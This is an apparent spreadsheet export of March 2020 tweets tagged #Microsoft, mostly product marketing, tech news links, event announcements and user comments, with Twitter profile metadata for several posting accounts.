    <t>{'id': 1078893526535061504, 'id_str': '1078893526535061504', 'name': 'Susafrica.com', 'screen_name': 'Susafrica_com', 'location': 'Nigeria.', 'description': 'https://t.co/t8SQXPIaXH is a Pan-African information portal. +2347036309859.', 'url': 'https://t.co/i55gh0RM6n', 'entities': {'url': {'urls': [{'url': 'https://t.co/i55gh0RM6n', 'expanded_url': 'https://susafrica.com/', 'display_url': 'susafrica.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/t8SQXPIaXH', 'expanded_url': 'http://Susafrica.com', 'display_url': 'Susafrica.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 69, 'friends_count': 256, 'listed_count': 0, 'created_at': 'Sat Dec 29 06:00:36 +0000 2018', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1149, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214856718162780160/IvnaQCEK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214856718162780160/IvnaQCEK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1078893526535061504/1578479391',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</si>
  <si>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13:36:50 +0000 2020</t>
  </si>
  <si>
    <t>Game reviewers, how long do YOU play a game before you review it? I know some games take anywhere from 10 minutes to 10 hours and beyond to play. Do you complete it, or just play it long enough to know if you like it or not? #gaming #nintendo #xbox #Microsoft #sega #Videogame</t>
  </si>
  <si>
    <t>{'id': 36768282, 'id_str': '36768282', 'name': 'Video Masters TV', 'screen_name': 'VMTVShow', 'location': 'Brick, NJ', 'description': 'VMTV reviews classic and modern Television, Video Games and Movies.\n\n#gaming #gamer #movies #marvel #dc #Nintendo #Xbox #Sega #ps3 #video #fun #retro', 'url': 'https://t.co/EdfNhUDoJm', 'entities': {'url': {'urls': [{'url': 'https://t.co/EdfNhUDoJm', 'expanded_url': 'http://www.vmtvshow.com', 'display_url': 'vmtvshow.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 345, 'listed_count': 5, 'created_at': 'Thu Apr 30 20:49:00 +0000 2009', 'favourites_count': 149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2196,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'http://pbs.twimg.com/profile_images/965644357566070784/iSSzx3o9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/965644357566070784/iSSzx3o9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36768282/1519063278',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</si>
  <si>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Mon Mar 02 13:35:16 +0000 2020</t>
  </si>
  <si>
    <t>The event will include - 
1. Web Development using Django from Scratch to Deployment
2. Web Penetration Testing
So what are you waiting for ? 
The site will go live soon, be prepared and get ready to register.
#MSPC #Microsoft #MicrosoftStudentPartnersCommunity</t>
  </si>
  <si>
    <t>Mon Mar 02 13:34:19 +0000 2020</t>
  </si>
  <si>
    <t>If you are currently running on Azure Service Manager (ASM) -  lease note today Microsoft officially announced the deprecation timeline for ASM.
#azure #asm #arm #microsoft #cloud #msftadvocate https://t.co/czOHdZDAEL</t>
  </si>
  <si>
    <t>{'id': 99768942, 'id_str': '99768942', 'name': 'Chuck Kiessling', 'screen_name': 'CKiessling', 'location': 'Seven Valleys, PA', 'description': 'Cloud Solutions Architect who specializes in using next-gen technology to architect data center and private cloud solutions #HyperV #Azure #PrivateCloud #SysCtr', 'url': 'http://t.co/a3dSedc1gw', 'entities': {'url': {'urls': [{'url': 'http://t.co/a3dSedc1gw', 'expanded_url': 'http://blogs.technet.com/b/chuck_kiessling', 'display_url': 'blogs.technet.com/b/chuck_kiesslâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 206, 'friends_count': 753, 'listed_count': 78, 'created_at': 'Sun Dec 27 19:42:22 +0000 2009', 'favourites_count': 47, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2672,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'http://pbs.twimg.com/profile_images/624752039587778560/8MADs_cI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/624752039587778560/8MADs_cI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/99768942/1462288493',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</si>
  <si>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Mon Mar 02 13:33:11 +0000 2020</t>
  </si>
  <si>
    <t>Roam around Earth in any and every browser!!
#googleearth #earth #3dmaps #navigation #terrains #roads #transit #mountains #google #alphabet #sundarpichai #larrypage #schmidt #apple #timcook #microsoft #samsung #oneplus #huawei #xiaomi #android #mkbhd
https://t.co/TvnzpRaBcr</t>
  </si>
  <si>
    <t>Mon Mar 02 13:32:40 +0000 2020</t>
  </si>
  <si>
    <t>We had an amazing time at @scottishsummit this weekend! This is truly an amazing community, we are looking forward to what the future holds!
https://t.co/DwyQYLi4HG
#ScottishSummit #SS2020 #Solgari #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 13:30:00 +0000 2020</t>
  </si>
  <si>
    <t>The #Top10 thing in tech to know today from @businessinsider tech reporter @CWoodJournalist 
#amazon #contractors #WHO #TikTok #Twitter #PaulSinger #JackDorsey #SXSW2020 #coronavirus #developers #Google #Uber #gigeconomy #microsoft #China #VC 
https://t.co/NcGO2a7e1M</t>
  </si>
  <si>
    <t>Mon Mar 02 13:29:11 +0000 2020</t>
  </si>
  <si>
    <t>"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognise and explore in order to achieve the same-targeted levels of power, ethics, and trust: https://t.co/zkJhxBk1Nc</t>
  </si>
  <si>
    <t>{'id': 58909755, 'id_str': '58909755', 'name': 'Onat Atayer', 'screen_name': 'onatatayer', 'location': 'Stockholm', 'description': 'AI passionate service delivery manager @ Microsoft. My tweets are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 190, 'listed_count': 50, 'created_at': 'Tue Jul 21 20:26:23 +0000 2009', 'favourites_count': 702, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1517,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'http://pbs.twimg.com/profile_images/1054032619640373248/Bm1jEtob_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054032619640373248/Bm1jEtob_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58909755/1540136381',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</si>
  <si>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13:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Learn 'Advanced Excel' to advance and excel in your career!
Join @mkclindia's KLiC Advanced Excel Course at @digitalguructi 
https://t.co/u1SRaSBmGn
https://t.co/RTg8OHGqLl
Call 9930081901 Now
#MKCL #DGCTI #KLiC #MSCIT #Course #Certification #Microsoft #Excel #Job #Career https://t.co/lfYUVxk6ZV</t>
  </si>
  <si>
    <t>{'id': 1161251451890311169, 'id_str': '1161251451890311169', 'name': 'Digital Guru Computer Training Institute', 'screen_name': 'digitalguructi', 'location': 'Mumbai', 'description': "MKCL's Authorised Learning Centre for MS-CIT and Career-oriented KLiC &amp; Mastering Courses.\n#DGCTI #MSCITatDGCTI #KLiCwithDGCTI", 'url': 'https://t.co/xvL9SuZtWR', 'entities': {'url': {'urls': [{'url': 'https://t.co/xvL9SuZtWR', 'expanded_url': 'http://www.dgcti.com', 'display_url': 'dgcti.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 41, 'listed_count': 0, 'created_at': 'Tue Aug 13 12:21:35 +0000 2019', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 56, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1178604430905659392/aui9RTjr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178604430905659392/aui9RTjr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1161251451890311169/1579924777',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</si>
  <si>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13:25:25 +0000 2020</t>
  </si>
  <si>
    <t>Last week our Managing Director, Adam Whittington, and Marketing Assistant, Kerisse Baron-Timmy, enjoyed a really productive, insightful meeting with Cheri Chevalier, Worldwide Sales Director for Emerging Solutions at Microsoft. 
#MySkills4Afrika #Microsoft #MMC https://t.co/8eWerSgX2M</t>
  </si>
  <si>
    <t>{'id': 95222822, 'id_str': '95222822', 'name': 'MMC South Africa', 'screen_name': 'MMCRSA', 'location': 'Cape Town', 'description': "Established in 1991, we're a Cape Town based IT company providing turn-key outsourced IT services to the small &amp; medium business sector.", 'url': 'http://t.co/lOWl7TH2rn', 'entities': {'url': {'urls': [{'url': 'http://t.co/lOWl7TH2rn', 'expanded_url': 'http://www.mmc.za.com', 'display_url': 'mmc.za.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 585, 'friends_count': 2271, 'listed_count': 41, 'created_at': 'Mon Dec 07 15:40:24 +0000 2009', 'favourites_count': 146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1344, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '430B59', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/885515609156587523/NE6be5BA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/885515609156587523/NE6be5BA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95222822/1548257037', 'profile_link_color': '3F9C35',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</si>
  <si>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Mon Mar 02 13:23:52 +0000 2020</t>
  </si>
  <si>
    <t>God damn #microsoft .you  just never can install new version of windows without that stupid comment "we couldn't create a new partition bla bla" and then go cleaning or "gbt mbr fucking game" and lose your whole files.i dont care file format idiot.</t>
  </si>
  <si>
    <t>{'id': 764754162445877248, 'id_str': '764754162445877248', 'name': 'Almo', 'screen_name': 'mymovali', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 82, 'listed_count': 0, 'created_at': 'Sun Aug 14 09:22:55 +0000 2016', 'favourites_count': 468, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 368, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223270331563069441/BpwFQo3p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223270331563069441/BpwFQo3p_normal.jpg',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</si>
  <si>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13:21:01 +0000 2020</t>
  </si>
  <si>
    <t>Announcing New Storage Options for Azure Cloud Shell https://t.co/U8f23kQcGv #azure #microsoftazure #microsoft #cloud</t>
  </si>
  <si>
    <t>Mon Mar 02 13:20:24 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #microsoft #infosec     VIA @Microsoft    MS Threat Protection stops attack sprawl &amp;amp; auto-heals enterprise assets with built-in intelligence &amp;amp; automation    @chuckdbrooks @mclynd @DrJDrooghaag @todddlyle @PVynckier @gvalan @JBarbosaPR https://t.co/yKg67bT5F9</t>
  </si>
  <si>
    <t>Mon Mar 02 13:17:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #SharePoint Roadmap Pitstop: February 2020 https://t.co/icu0a8beji https://t.co/18UsYJEEbP</t>
  </si>
  <si>
    <t>Mon Mar 02 13:15:57 +0000 2020</t>
  </si>
  <si>
    <t>Our webinar is just 2 days away! Know how to visualize your data effectively using #xViz Custom Visuals for #Microsoft #PowerBI.
APAC - https://t.co/OexiIRlwK1
US - https://t.co/BdeETO5H74
#Webinar #WebinarWednesday  #DataViz #Dashboard  #DataDrivenDecisions #Reporting #PBI #MSBI https://t.co/ZQXQH6G0sI</t>
  </si>
  <si>
    <t>{'id': 1154671340479111169, 'id_str': '1154671340479111169', 'name': 'xViz', 'screen_name': 'xvizsuite', 'location': 'TX, USA', 'description': 'xViz is a suite of Advanced Custom Visuals available to enable BI Practitioners to create compelling data story narratives.', 'url': 'https://t.co/IqpNY7lyAk', 'entities': {'url': {'urls': [{'url': 'https://t.co/IqpNY7lyAk', 'expanded_url': 'http://www.xviz.com', 'display_url': 'xviz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 48, 'listed_count': 0, 'created_at': 'Fri Jul 26 08:34:35 +0000 2019', 'favourites_count': 2,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'http://pbs.twimg.com/profile_images/1158962928520839168/fHAwxslK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158962928520839168/fHAwxslK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1154671340479111169/1576846795',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</si>
  <si>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13:14:40 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft has stepped up their game! Loving my #surfacepro7 and after the great customer service I received this weekend I may fully convert away from #apple products.</t>
  </si>
  <si>
    <t>{'id': 1365794654, 'id_str': '1365794654', 'name': 'Connie Smith Williams', 'screen_name': 'ConnieW10420476', 'location': '', 'description': 'Principle UX Designer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 61, 'listed_count': 0, 'created_at': 'Sat Apr 20 01:02:37 +0000 2013', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/701147387268452353/urYrwX57_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701147387268452353/urYrwX57_normal.jpg',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</si>
  <si>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13:08:00 +0000 2020</t>
  </si>
  <si>
    <t>Why choose #Microsoft #Dynamics365 Business Central? We have the answers. Download our eBook now to find out: https://t.co/eERCBmf8t4
#MD365BC #msdyn365 #d365bc #digitaltransformation https://t.co/7JWKxY2x0x</t>
  </si>
  <si>
    <t>{'id': 61151599, 'id_str': '61151599', 'name': 'IT Lab', 'screen_name': 'ITLabUK', 'location': 'United Kingdom', 'description': 'Ranked Top 50 Best Managed Service Providers Worldwide. Everything IT: Support, Consultancy, Change, Strategy, Productivity, Security. Call 0333 241 7689', 'url': 'https://t.co/F4ygSJceXx', 'entities': {'url': {'urls': [{'url': 'https://t.co/F4ygSJceXx', 'expanded_url': 'https://www.itlab.com', 'display_url': 'itlab.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2453, 'friends_count': 1112, 'listed_count': 121, 'created_at': 'Wed Jul 29 08:52:05 +0000 2009', 'favourites_count': 2240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4059, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF6600', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/938087997106421760/scFyD2Pi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938087997106421760/scFyD2Pi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/61151599/1512492600', 'profile_link_color': 'FF6600', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Mon Mar 02 13:06:13 +0000 2020</t>
  </si>
  <si>
    <t>Document Tracking Dashboard https://t.co/06D86T4Yts
#microsoft #sales #business #spreadsheet #excel #word #PowerPoint #smallbusiness #report #picture #trending #follow #cool #template</t>
  </si>
  <si>
    <t>Mon Mar 02 13:05:18 +0000 2020</t>
  </si>
  <si>
    <t>Deploying #Windows 10 Always On #VPN with @MSIntune using custom ProfileXML. #Microsoft #Windows10 #Win10 #mobility #msintune #aovpn https://t.co/bDOlLkvJAD</t>
  </si>
  <si>
    <t>Mon Mar 02 13:02:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Apple are top brands used in brand impersonation #attack method. https://t.co/4uxCL9YB7g #cybersecurity #hacking #technology #infosec #tech #hack #cyber #iot #privacy #cyberattack #hackers #cybercrime #data #hacked #ai #datasecurity #gdpr #security #phishing https://t.co/OjhoGMyH6k</t>
  </si>
  <si>
    <t>{'id': 903576157685248000, 'id_str': '903576157685248000', 'name': 'Keepnet Labs', 'screen_name': 'keepnetlabs', 'location': 'Cambridge, England', 'description': 'Keepnet is a cyber-security awareness and defence platform that provides a holistic approach to people, process and technology to reduce risk.', 'url': 'https://t.co/VuPC0pQmJC', 'entities': {'url': {'urls': [{'url': 'https://t.co/VuPC0pQmJC', 'expanded_url': 'http://www.keepnetlabs.com', 'display_url': 'keepnetlabs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 340, 'friends_count': 0, 'listed_count': 6, 'created_at': 'Fri Sep 01 11:11:58 +0000 2017', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 728, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/907283532363517952/5hozhab__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/907283532363517952/5hozhab__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/903576157685248000/1505230717',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</si>
  <si>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13:02:13 +0000 2020</t>
  </si>
  <si>
    <t>Reducing physician frustration with EHRs will share the spotlight at HIMSS20
https://t.co/5cCCqUSYsg
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65</t>
  </si>
  <si>
    <t>Mon Mar 02 13:01:48 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/4EHVubAOPS
Customize Video Gallery View
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd #uhd #ultrahd #casting https://t.co/ecNM3tHG7s</t>
  </si>
  <si>
    <t>Mon Mar 02 13:01:23 +0000 2020</t>
  </si>
  <si>
    <t>Webinar: Are you one of the 60% of O365 users without a data protection plan in place? #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6Bd25 https://t.co/FsL5uOamnz</t>
  </si>
  <si>
    <t>Mon Mar 02 13:01:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says Windows and Surface businesses will miss expectations due to coronavirus https://t.co/qCohvyLwLK https://t.co/BksQFNCNL7</t>
  </si>
  <si>
    <t>Mon Mar 02 13:00:43 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/aGogmshm9q</t>
  </si>
  <si>
    <t>Mon Mar 02 13:00:13 +0000 2020</t>
  </si>
  <si>
    <t>Leverage #AI and #machinelearning to address insider risks #Microsoft 
 #Azure https://t.co/UuoCuuUZJW</t>
  </si>
  <si>
    <t>{'id': 1697151848, 'id_str': '1697151848', 'name': 'DRMiguel22', 'screen_name': 'rodda2206', 'location': 'Luxembourg- AlcorcÃ³n /Madrid-Aranda de Duero-La Viliella/GijÃ³n ðŸ‡±ðŸ‡ºâœˆðŸ‡ªðŸ‡¸', 'description': 'IT Disruptive Strategy ðŸ–¥ | Business Relationship Partner, Head of Corporate IT âš™  | MCT  ðŸŽ“ #Cargolux #Gadesoft #DigitalTransformation', 'url': 'https://t.co/XM3NS9rrax', 'entities': {'url': {'urls': [{'url': 'https://t.co/XM3NS9rrax', 'expanded_url': 'https://www.linkedin.com/in/drmiguel22/', 'display_url': 'linkedin.com/in/drmiguel22/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 562, 'friends_count': 942, 'listed_count': 8, 'created_at': 'Sat Aug 24 18:31:29 +0000 2013', 'favourites_count': 6816, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10340,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'http://pbs.twimg.com/profile_images/1206384180122271744/nLzXh-Mx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206384180122271744/nLzXh-Mx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1697151848/1377421171',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</si>
  <si>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13:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Migrating #SharPoint to #Office365?  Ask yourself these 5 questions. https://t.co/OFq0IYzIHK
#microsoft #sharepointonline #microsoft365 https://t.co/IzXMx3d9zl</t>
  </si>
  <si>
    <t>Mon Mar 02 13:00:03 +0000 2020</t>
  </si>
  <si>
    <t>In India, Satya Nadella has empathy, coding, and cricket on his mind #Microsoft #GrowthMindset https://t.co/4RxAYpP2HW</t>
  </si>
  <si>
    <t>Mon Mar 02 13:00:02 +0000 2020</t>
  </si>
  <si>
    <t>After Action Review Template https://t.co/Gk5pZrYxI8
#microsoft #business #document #template #Excel #PowerPoint #Picture #docs #smallbusiness #Spreadsheet #online #register #startups</t>
  </si>
  <si>
    <t>Mon Mar 02 12:59:47 +0000 2020</t>
  </si>
  <si>
    <t>The moves come after the U.S. State Department raised the travel warning for northern Italy to its highest level, Level 4, a "do not travel'' alert, on Saturday. 
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software</t>
  </si>
  <si>
    <t>Mon Mar 02 12:59:29 +0000 2020</t>
  </si>
  <si>
    <t>#Cloud_computing is moving toward a smarter way of #data #processing for improved productivity and reduced fetch time.
Contact Caindus Systems, Inc. for your #Cloud Requirements!
.
.
.
.
#Serverless_Computing #DigitalTransformation #azureclouds #microsoft #azure #cloudmigration https://t.co/Iy5ac6Q78S</t>
  </si>
  <si>
    <t>{'id': 1006050368097153025, 'id_str': '1006050368097153025', 'name': 'Caindus', 'screen_name': 'CaindusSystems', 'location': 'Canada', 'description': 'Caindus mission to challenge how organizations engage #software #technology to create value to business by providing #Softwaredevelopment &amp; management #services', 'url': 'https://t.co/LIFshZ62YX', 'entities': {'url': {'urls': [{'url': 'https://t.co/LIFshZ62YX', 'expanded_url': 'https://www.caindus.com/', 'display_url': 'caindus.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 193, 'listed_count': 2, 'created_at': 'Mon Jun 11 05:47:54 +0000 2018', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1006423908201869313/ECrO1K4B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1006423908201869313/ECrO1K4B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1006050368097153025/1568355958',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</si>
  <si>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12:56:05 +0000 2020</t>
  </si>
  <si>
    <t>Ryder is looking for teammates like you. See our latest #Microsoft job openings, including "Coordinator 3-Used Vehicle Warranty", via the link in our bio. #Alpharetta, GA</t>
  </si>
  <si>
    <t>Mon Mar 02 12:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Muhammad Aurangzeb, the trainer for Visionets App in a Day session in #Berlin, works with mid-to-large enterprises to enable #Microsoft business apps. So bring your laptops to Microsoft Office on Tuesday, March 3, 2020 and learn to develop a custom app without any code.
#AIAD https://t.co/MMTCEy9s7w</t>
  </si>
  <si>
    <t>Mon Mar 02 12:55:03 +0000 2020</t>
  </si>
  <si>
    <t>Whats New in #Microsoft Teams | February 2020 https://t.co/GZUlEk6rvb https://t.co/yerxNKTlF2</t>
  </si>
  <si>
    <t>Mon Mar 02 12:54:46 +0000 2020</t>
  </si>
  <si>
    <t>Check this out, Lakunzo will draw your diagrams using #Visio on @fiverr for $20
#Microsoft #network #networks #Fiverr #fiverrgig #fiverrseller #visio
https://t.co/T78T9aYsG4</t>
  </si>
  <si>
    <t>Mon Mar 02 12:48:46 +0000 2020</t>
  </si>
  <si>
    <t>It was an honor being a part of this GREAT CHARITY for children in Puerto Rico.  We will be there NEXT YEAR!!!
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT #Caribbean #Intcomex #Jamaica #Kingston https://t.co/sphClSilw8</t>
  </si>
  <si>
    <t>Mon Mar 02 12:48:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Engineer #Pleads #Guilty to $10m #Fraud Scheme https://t.co/Fgy8zQvCts #bitcoin #internalfraud</t>
  </si>
  <si>
    <t>{'id': 203220676, 'id_str': '203220676', 'name': 'Andy Mayo', 'screen_name': 'AndyGMayo', 'location': '', 'description': 'Fraud geek. My tweets are my own views and do not necessarily represent the views of my employer. Re-tweets are not endorsements.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 179, 'friends_count': 153, 'listed_count': 43, 'created_at': 'Fri Oct 15 20:08:27 +0000 2010', 'favourites_count': 129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2660,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'http://pbs.twimg.com/profile_images/1187284027444781056/-ApW7mAf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187284027444781056/-ApW7mAf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/203220676/1398326979',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</si>
  <si>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12:44:41 +0000 2020</t>
  </si>
  <si>
    <t>This month at the Johannesburg O365 User Group: @brandon_botes  joins us talk about Office 365 Migrations. Plus we will have the usual news round-up and open discussions. #usergroup #office365 #microsoft https://t.co/dJ1E0xgz4q</t>
  </si>
  <si>
    <t>{'id': 283877286, 'id_str': '283877286', 'name': 'Odd Modlin', 'screen_name': 'OddModlin', 'location': 'Joburg, South Africa', 'description': 'Poligeek. Digital Workspace Consultant and Solution Architect. Speaker. Enthusiast. Blogger (https://t.co/hrXWCbHfTN) Podcaster (https://t.co/ikwaWw7Xoq)', 'url': 'https://t.co/hrXWCbHfTN', 'entities': {'url': {'urls': [{'url': 'https://t.co/hrXWCbHfTN', 'expanded_url': 'http://Oddmodlin.wordpress.com', 'display_url': 'Oddmodlin.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/hrXWCbHfTN', 'expanded_url': 'http://Oddmodlin.wordpress.com', 'display_url': 'Oddmodlin.wordpress.com', 'indices': [93, 116]}, {'url': 'https://t.co/ikwaWw7Xoq', 'expanded_url': 'http://2guysandsharepoint.co.za', 'display_url': '2guysandsharepoint.co.za', 'indices': [129, 152]}]}}, 'protected': False, 'followers_count': 246, 'friends_count': 120, 'listed_count': 31, 'created_at': 'Mon Apr 18 05:46:37 +0000 2011', 'favourites_count': 3985, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8117,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'http://pbs.twimg.com/profile_images/951805685569814528/V-N00eY6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/951805685569814528/V-N00eY6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/283877286/1547551734',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</si>
  <si>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12:42:19 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT https://t.co/ZTIcvYqTx7 Pot. intermed top in Uptrend LONGERTERM Wly-Dly-Hly combo chart #Microsoft #trading https://t.co/CzzGo9SMYk</t>
  </si>
  <si>
    <t>Mon Mar 02 12:42:10 +0000 2020</t>
  </si>
  <si>
    <t>BadBlood - Fills A Microsoft Active Directory Domain With A Structure And Thousands Of Objects https://t.co/yylJHHk2gT #ActiveDirectory #ActiveDirectoryDomain #BadBlood #Microsoft #PowerShell #Scripts</t>
  </si>
  <si>
    <t>Mon Mar 02 12:41:41 +0000 2020</t>
  </si>
  <si>
    <t>Check out my latest YouTube video to know Satya Nadella's top secret,
https://t.co/MPr0Wd1fqB
#HitRefresh #SatyaNadella #Entrepreneurship #culture #empathy #SuccessStories #Microsoft #ArtificialIntelligence 
#automation #future #Concept #Change #productivity #LearnTheRisk #5G</t>
  </si>
  <si>
    <t>{'id': 1103698334869413888, 'id_str': '1103698334869413888', 'name': 'Raghavendra Konamolla', 'screen_name': 'RKonamolla', 'location': 'Hyderabad, India', 'description': '23 years old/young, trainer, reader, fitness freak. I write on Quora. I may be young but my eyes are old.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 56, 'listed_count': 0, 'created_at': 'Thu Mar 07 16:46:03 +0000 2019', 'favourites_count': 83,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'http://pbs.twimg.com/profile_images/1175759240071245825/l7Sv689V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175759240071245825/l7Sv689V_normal.jpg',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</si>
  <si>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12:40:11 +0000 2020</t>
  </si>
  <si>
